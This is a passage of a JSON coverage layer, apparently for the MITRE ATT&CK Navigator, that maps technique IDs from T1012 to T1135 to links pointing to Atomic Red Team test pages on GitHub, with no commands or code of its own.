Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View 
